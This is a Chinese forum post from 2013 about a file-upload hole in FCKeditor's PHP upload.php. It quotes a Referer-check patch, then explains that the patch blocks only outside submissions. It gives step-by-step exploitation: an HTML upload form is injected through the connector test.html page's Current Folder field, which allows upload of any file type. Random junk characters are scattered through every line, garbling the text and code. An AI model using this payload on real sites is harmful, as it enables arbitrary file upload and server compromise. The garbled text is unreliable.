漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
6 g" A" M; H- k# T! {网上给出的修复方案是 |+ `, N9 O4 r- e/ X
修复方法,删除FCK编辑器用其他的编辑器! r1 }/ w& {/ H0 [7 e' m6 H
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件8 T1 n- [1 ]& X0 j
在
& Q J$ E& T$ u& }: u! |0 arequire(‘config.php’);
" g0 L+ Z# M, S4 Q' f3 V3 srequire(‘util.php’);- }1 x2 x% j6 C4 v0 [
的下面添加以下代码—————————–5 Q/ p: J, _! S: E9 J U
//防止外部提交' E. S& x; T. y% R4 r9 i
function outsidepost()
% ?3 x% j7 n% T+ q4 K{
( H. s( N4 c; S- e& a) h; o$servername=$_SERVER['SERVER_NAME'];
2 |8 n& b$ |! ^4 p* L6 i' h$sub_from=@$_SERVER['HTTP_REFERER'];
3 E; M5 ]" W) \( E h0 p; p$sub_len=strlen($servername);8 A w9 Z5 |" L6 t0 _% A2 a1 d1 y
$checkfrom=substr($sub_from,7,$sub_len);, n* {/ o6 j! e7 \! ~! N( I
if($checkfrom!=$servername){
5 u& S$ \6 B$ H8 ~" h5 h/ recho(“you don’t outsidepost!”);
% G5 ~# L* ?* F% K: e: l+ }" _8 `, fexit;
4 d6 N2 ~( b: P E! k2 T/ J! d} U: _" b( J7 W4 ^/ t2 } |9 v
}
) `( b$ j4 _# C n0 [1 soutsidepost();+ W# V1 X- t- o- m8 o2 p5 W' G
防止外部提交,但是没有防止内部提交,
. I2 }# R; [% `4 }9 G/ a( |利用方法:
: v& i5 y! O* U$ k: \) C. E8 [1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
8 N9 X/ z9 Y; t I5 R! N8 L5 h2,在Current Folder 框输入
0 `5 l& V) g( \7 k3 `<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>! R7 J4 f7 I' k* `. _
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
( {# k* y) T+ V/ z. LPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对